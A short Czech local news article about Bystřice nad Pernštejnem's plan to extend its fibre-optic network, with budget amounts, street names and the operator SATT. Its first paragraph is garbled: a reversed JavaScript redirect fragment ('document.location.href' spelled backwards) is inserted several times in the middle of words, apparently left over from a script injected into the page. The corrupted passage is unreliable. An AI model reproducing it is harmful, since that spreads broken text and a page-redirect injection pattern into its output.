Rainbow page separator

V Bystřici se chystají rozšířit optickou síť i mimo sídliště

Pátek, 29. ledna 2021

Bystřice nad Pernštejnem / Rozšířit optickou síť také do bytů mimo sídliště le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos plánuje bystřická radnice. Ta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to etapa by měla být výhledově zrealizována do roku 2025. V le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním rozpočtu vedení města na rozšíření optické sítě vyčlenilo pět milionů korun plus dalšího půl milionu uvolnilo na přípravu na ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to práce v Tyršově ulici. Za zmíněných pět milionů bude optická síť rozšířena zejména do ulic, kde již v rámci dřívějších rekonstrukcí proběhla příprava ve formě položení chrániček. Jedná se kupříkladu o ulice Bratrská, Kostelní, Na Vyhlídce a další.
O postupnou instalaci optických rozvodů se v Bystřici snaží už několik let, záměr byl rozdělen na etapy. Obyvatelům má v důsledku přinášet hlavně rychlejší internet a kvalitnější televizní signál. Smlouvu na pronájem optické sítě má bystřická radnice uzavřenou se žďárskou společností SATT, která si v Bystřici dlouhá léta pronajímá koaxiální rozvody a tamním uživatelům zajišťuje jak internet, tak i kabelovou televizi.